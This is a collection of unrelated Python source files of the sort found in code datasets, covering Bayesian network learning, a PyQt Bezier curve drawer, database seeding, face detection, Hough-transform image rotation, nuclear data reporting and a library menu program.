log_likelihood,log_prior,score = em.logmap,0.0,0.0
#log_likelihood = Util.logLikelihood(cpts,data,counts)
#log_prior = Util.logPrior(cpts,em.prior)
#score = log_likelihood + log_prior
stats['log_map'] = score
stats['log_likelihood'] = log_likelihood
stats['log_prior'] = log_prior
stats['iterations'] = em.iterations
stats['residual'] = em.residual
stats['map_residual'] = em.map_residual
stats['learn_time'] = em.learn_time
return BN(cpts)
def run_edml(bn,data,counts=None,seed=None,
iters=1024,eps=1e-4,psi=1,stats={}):
ed = EDML(bn,data,counts)
ed.setEdParameters(iters,eps,0.5)
ed.setPrior(psi)
if seed is None: seed = random_network(bn,0)
cpts = ed.compensate(seed.cpts())
log_likelihood,log_prior,score = ed.logmap,0.0,0.0
#log_likelihood = Util.logLikelihood(cpts,data,counts)
#log_prior = Util.logPrior(cpts,ed.prior)
#score = log_likelihood + log_prior
stats['log_map'] = score
stats['log_likelihood'] = log_likelihood
stats['log_prior'] = log_prior
stats['iterations'] = ed.iterations
stats['residual'] = ed.residual
stats['learn_time'] = ed.learn_time
return BN(cpts)
|
996,635 | f0c7521041c79ec8d5d6d121f3f7c020088cc182 | list = [3, 7, -2, 12]
max(list) - min(list) |
996,636 | 509bfa243b6fb7dc44ea01d3d37edde414891a9c | """
Draw bezier curve for a given set of points using the recursive de Castlejau algorithm. Implemented
using PyQt4
"""
import sys
from PyQt4.QtGui import *
from PyQt4.QtCore import *
INT_MAX = 100000
NEARNESS_THRESHOLD = 10
NUM_T_VALUES = 2000
class BezierWindow(QWidget):
def __init__(self, t_values=100):
super(BezierWindow, self).__init__()
self.points = []
self.t_values = t_values
self.mPixmap = QPixmap()
self.isModified = True
self.func = (None, None)
self.move_index = None
self.bezier_drawn = False
self.setGeometry(0, 0, 1024, 650)
self.setWindowTitle('Bezier Drawings - IS F311')
self.show()
def get_bezier_point(self, points, t):
'''
For a certain value of t, get the point on the final bezier curve. Returns a QPoint object of the
point on the bezier curve
'''
values = []
for i in range(1, len(points)):
values.append((points[i] * t) + (points[i-1] * (1-t)))
if len(values) == 1:
return values[0]
else:
return self.get_bezier_point(values, t)
def drawBezier(self, qp):
'''
Draw bezier curve on the QPainter object qp
'''
if not self.bezier_drawn:
t_values = [(i *1.0)/NUM_T_VALUES for i in range(0, NUM_T_VALUES)]
pen = QPen(Qt.blue, 3, Qt.SolidLine)
qp.setPen(pen)
for t in t_values:
bezier_point = self.get_bezier_point(self.points, t)
qp.drawPoint(bezier_point)
self.bezier_drawn = True
def paintEvent(self, event):
'''
Function triggered on every update() call.
'''
if self.isModified:
pixmap = QPixmap(self.size())
pixmap.fill(Qt.white)
painter = QPainter(pixmap)
painter.drawPixmap(0, 0, self.mPixmap)
self.drawBackground(painter)
self.mPixmap = pixmap
self.isModified = False
qp = QPainter(self)
qp.drawPixmap(0, 0, self.mPixmap)
def drawBackground(self, qp):
func, kwargs = self.func
if func is not None:
kwargs["qp"] = qp
func(**kwargs)
qp.end()
def addNode(self, qp, point, verbose=True):
'''
Add a new control point.
'''
pen = QPen(Qt.red, 7, Qt.SolidLine)
qp.setPen(pen)
qp.drawPoint(point)
self.points.append(point)
if len(self.points) > 1:
pen = QPen(Qt.black, 1, Qt.SolidLine)
qp.setPen(pen)
qp.drawLine(self.points[-2], self.points[-1])
if verbose:
print("New point added. Total points: ", len(self.points))
def redrawNodes(self, qp):
'''
Plot all the control points and lines again.
'''
nodes = self.points
self.points = []
for node in nodes:
self.addNode(qp=qp, point=node, verbose=False)
def get_nearest_point(self, point):
'''
Get the index of the nearest point to the argument point, from
the list of points in self.points.
'''
currrent_minimum = INT_MAX
current_index = -1
for index in range(0, len(self.points)):
node = self.points[index]
distance = node - point
distance = distance.manhattanLength()
if distance < NEARNESS_THRESHOLD and distance < currrent_minimum:
currrent_minimum = distance
current_index = index
return current_index
def mousePressEvent(self, QMouseEvent):
'''
processing mouse events
'''
if QMouseEvent.button() == Qt.LeftButton:
self.points.append(QMouseEvent.pos())
self.mPixmap.swap(QPixmap());
self.update()
self.func = (self.redrawNodes, {})
self.isModified = True
self.bezier_drawn = False
elif QMouseEvent.button() == Qt.RightButton:
print("Right Button Clicked: Remove Node")
nearest_point = self.get_nearest_point(QMouseEvent.pos())
if nearest_point == -1:
print("[Remove Failed] No node found near the place you've clicked.")
return
else:
self.move_index = None
self.mPixmap.swap(QPixmap());
self.update()
del self.points[nearest_point]
self.func = (self.redrawNodes, {})
self.isModified = True
self.bezier_drawn = False
elif QMouseEvent.button() == Qt.MiddleButton:
print("Middle Button Clicked: Move Node")
if self.move_index is None:
nearest_point = self.get_nearest_point(QMouseEvent.pos())
if nearest_point == -1:
print("[Move Failed] No node found near the place you've clicked.")
return
else:
self.move_index = nearest_point
print("Move: Node selected")
else:
self.points[self.move_index] = QMouseEvent.pos()
self.mPixmap.swap(QPixmap());
self.update()
self.func = (self.redrawNodes, {})
self.isModified = True
self.move_index = None
self.bezier_drawn = False
else:
print("Unidentified click (is this even possible?)")
return
self.update()
def keyPressEvent(self, event):
'''
processing keyboard events
'''
user_input = event.key()
if user_input == Qt.Key_C:
print("Clear Screen (C)")
self.mPixmap.swap(QPixmap());
self.update()
self.points = []
self.bezier_drawn = False
elif user_input == Qt.Key_U:
print("Selection undone (U)")
self.move_index = None
elif user_input == Qt.Key_D:
print("Draw Bezier Curve (D)")
self.func = (self.drawBezier, {})
self.isModified = True
self.update()
if user_input == Qt.Key_R:
print("Refresh Screen (R)")
self.mPixmap.swap(QPixmap());
self.update()
self.func = (self.redrawNodes, {})
self.isModified = True
self.update()
self.bezier_drawn = False
else:
print("Unidentified keyboard input.")
if __name__ == '__main__':
'''
Driver code
'''
app = QApplication(sys.argv)
ex = BezierWindow()
sys.exit(app.exec_())
|
996,637 | 8ac19451b67b894c235d9141de592b30b4fd96f1 | from activitylog import *
from datetime import datetime
from datetime import date
def createDB():
db.create_tables([Person, ActivityType, Activity, MeasurementType, Measurement, Location])
def defaultActivities():
root = ActivityType.create(name="BaseActivityType", is_abstract=True)
mindful = ActivityType.create(name="Mindful", parent=root, is_abstract=True)
aerobic = ActivityType.create(name="Aerobic", parent=root, is_abstract=True)
yoga = ActivityType.create(name="Yoga", parent=mindful, is_abstract=True)
unheated_yoga = ActivityType.create(name="UnheatedYoga", parent=yoga)
heated_yoga = ActivityType.create(name="HeatedYoga", parent=yoga)
meditation = ActivityType.create(name="Meditation", parent=mindful)
running = ActivityType.create(name="Running", parent=aerobic)
hiking = ActivityType.create(name="Hiking", parent=aerobic)
walking = ActivityType.create(name="Walking", parent=aerobic)
def defaultPeople():
birth = date(1974,6,2)
adam = Person.create(name="adam", first="Adam", last="Wynne", born=birth)
def defaultLocations():
Location.create(name="YogaFlowSouth", longname="Yoga Flow South Hills", address="250 Mount Lebanon Boulevard, Pittsburgh, PA 15234")
Location.create(name="HIP", longname="Himalayan Institute, Pittsburgh", address="300 Beverly Rd, Pittsburgh, PA 15216")
Location.create(name="Gilfilan", longname="Gilfilan Farms", address="130 Orr Rd, Upper St Clair, PA 15241")
Location.create(name="Home", longname="Home", address="172 Topsfield Rd, Pittsburgh, PA 15241")
def testEntries():
adam=Person.select().where(Person.name =="adam")
hiking=ActivityType.select().where(ActivityType.name == "Hiking")
gilfilan=Location.select().where(Location.name == "Gilfilan")
#Activity.create(start=datetime(2016,1,2,10,00,00), end=datetime.now(), person=adam, activityType=hiking, location=gilfilan, distance=3)
def init():
createDB()
defaultActivities()
defaultPeople()
defaultLocations()
testEntries()
init()
|
996,638 | 6476dc4aede72f4e11ceb54868a4b4e1f3926d5c | import sys
def write_items(items, num):
with open(str(num).zfill(2) + '_forumpage.txt', 'w') as f2:
f2.write('\n'.join(items))
def main():
assert len(sys.argv) == 3
items = set()
num = int(sys.argv[2])
with open(sys.argv[1], 'r') as f:
for line in f:
line = line.strip().split(':')
if line[0] == 'memberpages' or len(line) == 0:
continue
site, forum, pages = line[1:]
for i in range(1, int(pages)+1, 3):
items.add(':'.join(['forumpage', site, forum, str(i) + '-' \
+ str(i+2)]))
if len(items) >= 200000:
write_items(sorted(items), num)
num += 1
items = set()
write_items(items, num)
if __name__ == '__main__':
main()
|
996,639 | 36b0db8a803e78ecbaef4ac0b05f1536b0c70720 | """
This module will test the status command
"""
import time
from controller.app import Configuration
from tests import (
Capture,
create_project,
exec_command,
execute_outside,
init_project,
pull_images,
start_project,
start_registry,
)
def test_all(capfd: Capture) -> None:
execute_outside(capfd, "status")
create_project(
capfd=capfd,
name="xx",
auth="postgres",
frontend="no",
)
init_project(capfd)
start_registry(capfd)
pull_images(capfd)
if Configuration.swarm_mode:
exec_command(
capfd,
"status",
"Manager",
"Ready+Active",
"No service is running",
)
else:
exec_command(
capfd,
"status",
"No container is running",
)
start_project(capfd)
if Configuration.swarm_mode:
exec_command(
capfd,
"status",
"Manager",
"Ready+Active",
"xx_backend",
"xx_postgres",
" [1]",
# No longer found starting because
# HEALTHCHECK_INTERVAL is defaulted to 1s during tests
# "starting",
"running",
)
init_project(capfd, "", "--force")
exec_command(
capfd,
"start --force",
"Stack started",
)
time.sleep(4)
exec_command(
capfd,
"status",
"running",
)
exec_command(
capfd,
"status backend",
"running",
)
exec_command(
capfd,
"status backend postgres",
"running",
)
else:
exec_command(
capfd,
"status",
"xx-backend-1",
)
exec_command(
capfd,
"status backend",
"xx-backend-1",
)
exec_command(
capfd,
"status backend postgres",
"xx-backend-1",
)
|
996,640 | 7001ab8bfd7d64f19cc9fe909689bd4ce91d7bb4 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('shares', '0014_auto_20151113_0916'),
]
operations = [
migrations.CreateModel(
name='Correlation',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('day_interval', models.PositiveSmallIntegerField()),
('value', models.FloatField()),
('input_shares', models.ForeignKey(related_name='+', to='shares.Share')),
('output_shares', models.ForeignKey(related_name='+', to='shares.Share')),
],
),
]
|
996,641 | 8b08bec8be01016f964716e433aa6cdccdca3def | """
This is a companion to my [previous
challenge](https://edabit.com/challenge/mZqMnS3FsL2MPyFMg).
Given an English description of an integer in the range **0 to 999** , devise
a function that returns the integer in numeric form.
### Examples
eng2nums("four") ➞ 4
eng2nums("forty") ➞ 40
eng2nums("six hundred") ➞ 600
eng2nums("one hundred fifteen") ➞ 115
eng2nums("seven hundred sixty seven") ➞ 767
### Notes
* No hyphens are used in test cases ("twenty three" not "twenty-three").
* The word "and" is not used: "one hundred three" not "one hundred and three".
"""
def eng2nums(s):
z=0
etn={"zero":0,'one':1,'two':2,'three':3,'four':4,'five':5,'six':6,'seven':7,
'eight':8,'nine':9,'ten':10,'eleven':11,'twelve':12,'thirteen':13,'fourteen':14,
'fifteen':15,'sixteen':16,'seventeen':17,'eighteen':18,'nineteen':19,'twenty':20,'thirty':30,
'forty':40,'fifty':50,'sixty':60,'seventy':70,'eighty':80,'ninety':90}
l = s.split(' ')
for i in l:
if i=="hundred":
z=str(z)+"00"
z=int(z)
continue
z=z+etn[i]
return z
print(eng2nums("six hundred forty six"))
|
996,642 | 1a4e5666dad3913bc491cf2f8ac804eb3471890e | import os
def print_file(filename):
print("\n" + filename)
print("=" * len(filename))
with open(filename, "r") as f:
lineno = 1
for line in f.readlines():
print(f"{lineno:03} : {line}", end='')
lineno += 1
for (dirname, dirs, files) in os.walk(r"e:\classroom\python\jan27\demo"):
for f in files:
if f.endswith(".py"):
print_file(dirname + "\\" + f)
|
996,643 | 8e70e69e5a271c76bfb9c722e25aa8c337f27c86 | from typing import List
"""
Dynamic Programming
if a%b==0 and c%b==0, then c%a==0
Sort the nums and keep track of all nums before index i which meet the condition: nums[i]%nums[i-n]==0.
"""
class Solution:
def largestDivisibleSubset(self, nums: List[int]) -> List[int]:
if not nums:
return []
res = []
nums.sort() # put divisor before dividend
subsets = [[n] for n in nums] # list to store subsets of nums meet the condition. initail as [[1],[2],[3]]
for i in range(len(nums)):
for j in range(i):
if nums[i]%nums[j]==0 and len(subsets[i])< len(subsets[j])+1:
subsets[i] = [nums[i]] + subsets[j] # find the max among all nums meet the condition
return max(subsets, key = len) |
996,644 | 9165d511a6659e3c6e7eb8094801b8e365e6e64a | """ Abstract class module for unified
"""
from abc import abstractmethod
from lead2gold.motif.motif import Motif
class Tool():
"""Base abstract class for known tools and required functions
"""
def __init__(self, toolName):
"""Initialize all class attributes with their default values.
"""
self.toolName = toolName
@abstractmethod
def parse(self, file_path, type=None):
"""Parse the motif from given motif file.
Tool should recognize input type but for speedup this can be skipped by adding $type param.
Function should raise as soon as posible if motif does not seems to be in valid format.
Args:
path: path of the motif file.
type: type of tool output (stdout, .meme, .w2, etc.)
Returns:
Returns [Motif()].
"""
return [Motif()]
@abstractmethod
def print(self, motif, file_path):
"""Performs motif search.
Args:
motif: object Motif for
file_path: file where motif would be saved.
Returns:
Returns None
"""
return None
|
996,645 | 302459c5be3f70081bb28be495b7605e54672f66 | #!/usr/bin/env python
import os.path, sys, argparse
sys.path.append(os.path.split(__file__)[0]+os.sep+'..')
from inter import *
# -------------------------------------------------------------------------------
# Comamnd line parsing
# -------------------------------------------------------------------------------
def parse_arguments():
'''Parse the command line'''
parser = argparse.ArgumentParser(\
description='''
Super fancy replacement for legacy INTER format.
This does everything that legacy INTER does (use the "--legacyINTERReport" option), and so much more.
''')
# Required command line options
parser.add_argument('ENDF', type=str, help='ENDF file(s) whose cross section you want to study.' )
# Set output
parser.add_argument('-o', dest='outFile', default=None, type=str, help='Output to a file called OUTFILE, instead of printing to stdout.' )
# Verbosity
parser.add_argument('-v', dest='verbose', default=False, action='store_true', help="Enable verbose output." )
# Control covariance usage
parser.add_argument('--noCovariance', dest='useCovariance', action='store_false', help="Do not use covariance when computing values")
parser.add_argument('--useCovariance', dest='useCovariance', action='store_true', default=True, help="If an evaluation has them, use covariances when computing values (the default)")
# Limit output to certain things, such as MT or angular momenta J, L, S, and therefore Pi
parser.add_argument('--MT', type=int, default=None, help='If given, only work with this MT.' )
parser.add_argument('--MTList', default=None, choices=['legacy', 'major', 'all'], help='')
# parser.add_argument('--L', type=int, default=None, help="If given, only work with this L, orbital angular momentum of channel" )
# parser.add_argument('--J', type=int, default=None, help="If given, only work with this J, total angular momentum of channel" )
# parser.add_argument('--S', type=int, default=None, help="If given, only work with this S, spin of compound nucleus formed" )
# Astrophysics metrics of cross section data
parser.add_argument('--MACS', type=float, default=None, help="Compute MACS, give kT in keV as argument" )
parser.add_argument('--ARR', type=float, default=None, help="Compute astrophysical reaction rate, give kT in keV as argument")
# Nuclear enginering metrics of cross section data
parser.add_argument('--RI', default=False, action='store_true', help="Compute resonance integral, cut off at 0.5 eV")
parser.add_argument('--thermal', default=False, action='store_true', help="Compute thermal cross section")
parser.add_argument('--Westcott',default=False, action='store_true', help="Compute Westcott factor")
parser.add_argument('--ALF', default=False, action='store_true', help="(capture cs)/(fission cs) at thermal")
parser.add_argument('--ETA', default=False, action='store_true', help="nubar*(fission cs)/(absorption cs) at thermal")
# Integral metrics of cross section data
parser.add_argument('--CfSpectAnalytic',default=False, action='store_true', help="Compute 252Cf spontaneous fission spectrum average, using analytic approximation of [FIXME]")
parser.add_argument('--CfSpect',default=False, action='store_true', help="Compute 252Cf spontaneous fission spectrum average")
parser.add_argument('--14MeV', dest='fourteen', default=False, action='store_true', help="Get 14 MeV point")
parser.add_argument('--Godiva', default=False, action='store_true', help="Compute Godiva (HMF001) assembly spectrum average")
parser.add_argument('--Jezebel', default=False, action='store_true', help="Compute Jezebel (PMF001) assembly spectrum average")
parser.add_argument('--BigTen', default=False, action='store_true', help="Compute BigTen (IMF007) assembly spectrum average")
parser.add_argument('--FUNDIPPE', default=False, action='store_true', help="Compute FUND-IPPE (FIXME) assembly spectrum average")
# Popular neutron sources
if TURNONNEUTRONNSOURCES: parser.add_argument('--ddSource', default=None, type=float, help="Compute spectrum average using d(d,n)3He reaction as a neutron source, argument is deuteron energy in MeV.")
if TURNONNEUTRONNSOURCES: parser.add_argument('--dtSource', default=None, type=float, help="Compute spectrum average using d(t,n)4He reaction as a neutron source, argument is deuteron energy in MeV.")
if TURNONNEUTRONNSOURCES: parser.add_argument('--ptSource', default=None, type=float, help="Compute spectrum average using p(t,n)3He reaction as a neutron source, argument is proton energy in MeV.")
if TURNONNEUTRONNSOURCES: parser.add_argument('--pLiSource', default=None, type=float, help="Compute spectrum average using p(7Li,n)7Be reaction as a neutron source, argument is proton energy in MeV.")
# Resonance metrics
parser.add_argument('--scatteringRadius', default=False, action='store_true', help="FIXME")
parser.add_argument('--neutronStrengthFunction', default=False, action='store_true', help="FIXME")
parser.add_argument('--neutronPoleStrength', default=False, action='store_true', help="FIXME")
parser.add_argument('--gammaStrengthFunction', default=False, action='store_true', help="FIXME")
parser.add_argument('--averageWidth', default=False, action='store_true', help="Average resonance width per channel in both the RRR and URR")
parser.add_argument('--meanLevelSpacing', default=False, action='store_true', help="Mean level spacing per channel in both the RRR and URR")
parser.add_argument('--DysonMehtaDelta3', default=False, action='store_true', help="FIXME")
parser.add_argument('--effectiveDOF', default=False, action='store_true', help="FIXME")
parser.add_argument('--transmissionCoeff', default=False, action='store_true', help="Transmision coefficient per channel in both the RRR and URR, computed by Moldauer's sum rule")
# Full report controls
reportChoices=['astrophysics','engineering','integral','resonance','legacy','summary']
if TURNONNEUTRONNSOURCES: reportChoices.append('nsources')
parser.add_argument('--report', default=None, choices=reportChoices, help='Style of report to generate (Default: None)')
parser.add_argument('--reportFormat', default='txt', choices=['html','txt','csv','json'], help="Format of output report (Default:txt)")
return parser.parse_args()
# -------------------------------------------------------------------------------
# Main!!
# -------------------------------------------------------------------------------
if __name__ == "__main__":
# Parse command line
theArgs = parse_arguments()
# Set the MTList
if theArgs.report == 'legacy' or theArgs.MTList == 'legacy':
theArgs.MTList = [1,2,102,18]
elif theArgs.MT != None:
theArgs.MTList = [theArgs.MT]
elif theArgs.MTList == 'major':
theArgs.MTList = [1,2,4,16,17,22,102,103,107,18]
else:
theArgs.MTList=None
# Read in evaluation
rep=EvaluationReport(theArgs.ENDF,theArgs.MTList)
# Reaction table
if theArgs.report is None or theArgs.report in ['astrophysics','engineering','integral','legacy','summary']:
rep.get_reaction_metrics(theArgs)
# ALF, ETA addendum
if theArgs.report is None or theArgs.report in ['engineering','summary']:
rep.get_global_metrics(theArgs)
# Resonance table
if theArgs.report in ['resonance','summary']:
rep.get_resonance_metrics(theArgs)
if theArgs.scatteringRadius:
print computeScatteringRadius(rep.reactionSuite.getReaction('elastic').crossSection)
# ---------------------------------
# Generate report
# ---------------------------------
if theArgs.reportFormat=='txt': report = rep.text_report(theArgs)
elif theArgs.reportFormat=='json': report = rep.json_report(theArgs)
elif theArgs.reportFormat=='csv': report = rep.csv_report(theArgs)
elif theArgs.reportFormat=='html': report = '\n'.join(rep.html_report(theArgs))
else: raise ValueError("Output format %s unknown"%theArgs.reportFormat)
# Output report
if theArgs.outFile is None: print report
else: open(theArgs.outFile,mode='w').write(report)
|
996,646 | 0c54bbc7d7f2cbca2b790ce3b6145c118136d077 | def GetTranslatedText(tag, languageCode):
# establish database connection
import database
import pyodbc
connectionString = database.GetConnectionString()
conn = pyodbc.connect(connectionString)
#rowsAffected = 0 # problems getting rows affected from MS SQL...
try:
# create query and run it
SQL = r'exec dbo.SP_TRANS_GetGetTranslatedText @tag = ' + "'" + str(tag) + "', " + '@language_code = '+ "'" + str(languageCode) + "'"
cursor = conn.cursor()
cursor.execute(SQL)
translated_text = "---"
translated_text = cursor.fetchone().Text
except pyodbc.Error as err:
print("Databasefeil: %s" % err)
except:
print("Generell feil!")
finally:
cursor.close()
conn.close()
return translated_text
# DONE Add function to add user language dynamically using Google translate?
def GoogleTranslate(language_code, text_eng):
# get translation from Google Translate API
from googletrans import Translator
translator = Translator()
text_trans = translator.translate(text_eng, src='en', dest=language_code).text
return text_trans
def update_translations():
# TODO create function that accept stored procedure name, runs it and handles errors
# establish database connection
import database
import pyodbc
connectionString = database.GetConnectionString()
conn = pyodbc.connect(connectionString)
#rowsAffected = 0 # problems getting rows affected from MS SQL...
try:
# create query and run it
SQL = r'exec dbo.SP_TRANS_GetTranslationQueue'
cursor = conn.cursor()
cursor.execute(SQL)
for row in cursor.fetchall():
trans_id = row[0]
#language_id = row[1]
language_code = row[2]
#trans_tag = row[3]
text_eng = row[4]
text_trans = GoogleTranslate(language_code, text_eng)
#text_trans = "Dette er en test"
# update Translate-table with translation
cursor.execute("UPDATE Translation SET Text = ? WHERE TranslationID = ?", text_trans, trans_id)
cursor.commit()
except pyodbc.Error as err:
print("Databasefeil: %s" % err)
except:
print("Generell feil!")
finally:
cursor.close()
conn.close()
#update_translations()
|
996,647 | 89669610d822e1d2753e0da5fad8cd767264ff3d | # from keras.models import load_model
# # load the model
# model = load_model('facenet_keras.h5')
# # summarize input and output shape
# print(model.inputs)
# print(model.outputs)
# function for face detection with mtcnn
from PIL import Image
from numpy import asarray
from mtcnn.mtcnn import MTCNN
# extract a single face from a given photograph
def extract_face(filename, required_size=(160, 160)):
# load image from file
image = Image.open(filename)
image.show();
# convert to RGB, if needed
image = image.convert('RGB')
# convert to array
pixels = asarray(image)
print("pixeks as arrya =============<>", pixels)
# create the detector, using default weights
detector = MTCNN()
# detect faces in the image
results = detector.detect_faces(pixels)
# extract the bounding box from the first face
x1, y1, width, height = results[0]['box']
# bug fix
x1, y1 = abs(x1), abs(y1)
x2, y2 = x1 + width, y1 + height
# extract the face
face = pixels[y1:y2, x1:x2]
# resize pixels to the model size
image = Image.fromarray(face)
image = image.resize(required_size)
face_array = asarray(image)
image.show()
return face_array
# load the photo and extract the face
pixels = extract_face('./vT1.jpg');
print("pixels ======>", pixels); |
996,648 | 6899645de75426f47a97c2e9ef5aab81e61218e3 | /home/vinay/anaconda3/lib/python3.7/warnings.py |
996,649 | e65a11a661ca0009e21bc49c121cfef9ebb2343e | import sys
MAPPING = {
'1': {
'1': ('1', 1),
'i': ('i', 1),
'j': ('j', 1),
'k': ('k', 1),
},
'i': {
'1': ('i', 1),
'i': ('1', -1),
'j': ('k', 1),
'k': ('j', -1),
},
'j': {
'1': ('j', 1),
'i': ('k', -1),
'j': ('1', -1),
'k': ('i', 1),
},
'k': {
'1': ('k', 1),
'i': ('j', 1),
'j': ('i', -1),
'k': ('1', -1),
},
}
def multQ(a, b):
mapping = MAPPING[a[0]][b[0]]
return (mapping[0], mapping[1] * a[1] * b[1])
def simplify(vals, X):
step = 0;
val = ('1', 1)
for i in xrange(X):
for c in vals:
val = multQ(val, c)
if step == 0 and val[0] == 'i' and val[1] == 1:
step = 1
elif step == 1 and val[0] == 'k' and val[1] == 1:
step = 2
elif step == 2 and val[0] == '1' and val[1] == -1:
step = 3
if step != 3: return False
return val[0] == '1' and val[1] == -1
# Since the file structure is 100% ensured, just skip the line count
T = int(sys.stdin.readline().strip())
for i in xrange(T):
[L, X] = sys.stdin.readline().strip().split(' ')
vals = [(c, 1) for c in sys.stdin.readline().strip()]
valid = simplify(vals, int(X))
# i*j*k == -1, so we just need to ensure that the final result is -1.
print "Case #%d: %s" % (i + 1, valid and 'YES' or 'NO')
|
996,650 | 5b7ab0d3df7f2b9ede5cd14add2a049d991efc43 | import cv2
import matplotlib.pyplot as plt
#importazione delle librerie necessarie
import numpy as np
import math
def houghSpace(im):
maxTheta = 180
#la larghezza dello spazio corrisponde alla massima angolatura presa in considerazione
houghMatrixCols = maxTheta
#dimensioni dell'immagine originale
h, w = im.shape
#non puo' esistere nell'immagine una distanza superiore alla diagonale
rhoMax = math.sqrt(w * w + h * h)
#l'altezza dello spazio è il doppio della rho massima, per considerare anche
#le rho negative
houghMatrixRows = int(rhoMax) * 2 + 1
#le rho calcolate verranno traslate della metà dell'altezza per poter rappresentare nello spazio
#anche le rho negative
rhoOffset = houghMatrixRows/2
#riscalature per passare da angoli a radianti
degToRadScale = 0.01745329251994329576923690768489 # Pi / 180
#$seno e coseno precalcolati
rangemaxTheta = range(0,maxTheta)
sin, cos = zip(*((math.sin(i * degToRadScale), math.cos(i * degToRadScale)) for i in rangemaxTheta))
#inizializzazione dello spazio
houghSpace = [0.0 for x in range(houghMatrixRows * houghMatrixCols)]
#scorro tutta l'immagine originale
for y in range(0, h):
for x in range(0, w):
#per ogni punto di bordo
if im[y, x] > 0:
#calcolo il suo fascio di rette...
for theta in rangemaxTheta:
#... per ogni angolazione theta nello spazio, calcolo il relativo valore di rho
#... utilizzando la forma polare dell'equazione della retta
rho = int(round(x * cos[theta] + y * sin[theta] + rhoOffset))
#una volta note le coordinate theta e rho, incremento il contatore dello spazio di Hough
# alla coordinata
c = rho * houghMatrixCols + theta
houghSpace[c] = houghSpace[c] + 1
# normalizzazione tra 0 e 1
m = np.max(houghSpace)
houghSpace = houghSpace / m
return np.reshape(houghSpace , (houghMatrixRows, houghMatrixCols)) #reshape in forma matriciale
filename = r'img\img3.jpg'
#caricamento dell'immagine da disco
im = cv2.imread(filename, cv2.IMREAD_GRAYSCALE)
h, w = im.shape
#ridimensionamento dell'immagine
im = cv2.resize(im, (w/3,h/3))
#canny edge detector
im = cv2.Canny(im, 100, 200)
#applicazione del calcolo dello spazio di hough all'immagine di input
hSpace = houghSpace(im)
#visualizzazione dello spazio risultante
h, w = hSpace.shape
fig, ax = plt.subplots(figsize=(10, 10))
cax = ax.imshow(hSpace, extent=[0,w,0,h])
plt.colorbar(cax, ticks=[0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1])
plt.show()
#filtraggio dei picchi
hSpace[hSpace < 0.8] = 0
#calcolo dell'istogramma
hist = sum(hSpace)
#calcolo dell'angolo perpendicolare
theta1 = 90 - np.argmax(hist)
#rilettura dell'immagine a colori
im = cv2.imread(filename, cv2.IMREAD_COLOR)
#rotazione dell'immagine
h, w, d = im.shape
rotation_M = cv2.getRotationMatrix2D((w / 2, h / 2), -theta1, 1)
rotated_im = cv2.warpAffine(im, rotation_M, (w,h), flags=cv2.INTER_CUBIC)
#scrittura su disco
cv2.imwrite(r'img\rotated.jpg', rotated_im) |
996,651 | 192bfc7adeb2d55c013a8f5d146d9987ed50f339 | # displayMenu:
# displays a menu with options
# DO NOT MODIFY THIS FUNCTION
import Library as Library
if __name__ == "__main__":
def display_menu():
print("Select a numerical option:")
print("======Main Menu=====")
print("1. Read book file")
print("2. Read user file")
print("3. Print book list")
print("4. Get rating")
print("5. Find number of books user rated")
print("6. View ratings")
print("7. Get average rating")
print("8. Add a user")
print("9. Checkout a book")
print("10. Get recommendations (not implemented yet)")
print("11. Quit")
if __name__ == "__main__":
my_lib = Library.Library()
choice = "-1"
while choice != 11:
display_menu()
choice = input()
try:
choice = int(choice)
except:
print("Invalid input")
continue
if choice == 1:
filename = input("Enter a book file name:\n")
a = int(my_lib.read_books(filename))
if a == -1:
print('No books saved to the database.')
if a == -2:
print('Database is already full. No books were added.')
if a == int(my_lib.get_size_books()):
print("Database is full. Some books may have not been added.")
if a != -1 and a != -2 and a != int(my_lib.get_size_books()):
print('Total books in the database:', a)
elif choice == 2:
filename = input("Enter a user file name:\n")
b = int(my_lib.read_ratings(filename))
if b == -1:
print("No users saved to the database.")
if b == -2:
print("Database is already full. No users were added.")
if b == int(my_lib.get_size_users()):
print("Database is full. Some users may have not been added.")
if b != -1 and b != -2 and b != int(my_lib.get_size_users()):
print('Total users in the database:', b)
elif choice == 3:
if int(my_lib.get_num_users()) == 0 or int(my_lib.get_num_books()) == 0:
print('Database has not been fully initialized.')
else:
my_lib.print_all_books()
elif choice == 4:
if int(my_lib.get_num_users()) == 0 or int(my_lib.get_num_books()) == 0:
print('Database has not been fully initialized.')
else:
# Get a user name from the user's input
username = input('Enter user name:\n')
# Get a book title from the user's input
booktitle = input('Enter book title:\n')
c = int(my_lib.get_rating(username,booktitle))
if c == 0:
print(username,'has not rated', booktitle)
if c == -3:
print(username,'or', booktitle, 'does not exist')
if c != 0 and c != -3:
print(username, 'rated', booktitle, 'with', c)
elif choice == 5:
if int(my_lib.get_num_users()) == 0 or int(my_lib.get_num_books()) == 0:
print('Database has not been fully initialized.')
else:
username = input('Enter user name:\n')
d = int(my_lib.get_count_read_books(username))
if d == 0:
print(username,'has not rated any books')
if d == -3:
print(username,'does not exist')
if d != 0 and d != -3:
print(username, 'rated', d, 'books')
elif choice == 6:
if int(my_lib.get_num_users()) == 0 or int(my_lib.get_num_books()) == 0:
print('Database has not been fully initialized')
else:
username = input('Enter user name:\n')
my_lib.view_ratings(username)
elif choice == 7:
if int(my_lib.get_num_users()) == 0 or int(my_lib.get_num_books()) == 0:
print('Database has not been fully initialized.\n')
else:
booktitle = input('Enter book title:\n')
a = my_lib.calc_avg_rating(booktitle)
if int(a) == -3:
print(booktitle, 'does not exist\n')
else:
print('The average rating for', booktitle, 'is', a)
print()
continue
elif choice == 8:
username = input('Enter the new user\'s name:\n')
b = my_lib.add_user(username)
if b == -2:
print("Database is full.", username,"was not added")
print()
if b == 0:
print(username, 'already exists in the library')
print()
if b != -2 and b != 0:
print('Welcome to the library,', username)
print()
continue
elif choice == 9:
if int(my_lib.get_num_users()) == 0 or int(my_lib.get_num_books()) == 0:
print('Database has not been fully initialized.')
print()
else:
username = input('Enter the new user\'s name:\n')
booktitle = input('Enter book title:\n')
newrating = int(input('Enter rating for the book:\n'))
c = my_lib.check_out_book(username, booktitle, newrating)
if c == -4:
print('Rating is not valid')
print()
if c == -3:
print(username, 'or', booktitle, 'does not exist')
print()
if c != -4 and c!= -3:
print("Hope you enjoyed your book; the rating has been updated.")
print()
continue
elif choice == 10:
# haven't decided what to do..lol
continue
elif choice == 11:
print("Goodbye!")
else:
print("Invalid input")
print()
|
